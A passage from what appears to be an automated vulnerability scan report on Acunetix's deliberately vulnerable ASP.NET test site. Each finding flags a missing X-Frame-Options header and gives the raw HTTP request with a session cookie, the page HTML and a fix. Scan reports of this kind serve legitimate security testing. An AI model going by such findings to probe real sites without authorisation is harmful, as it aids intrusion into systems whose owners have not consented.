href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site: if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        6. GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 14245
          
          
          Response body (14245 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKpxZClDQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/pbihq93nLJJrCcGURk6iWNCIK+A==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a>
          						<DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), then you'll want to use SAMEORIGIN; otherwise, if you never expect the page to be framed, you should use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        7. GET http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13914
          
          
          Response body (13914 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a>
          						<DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
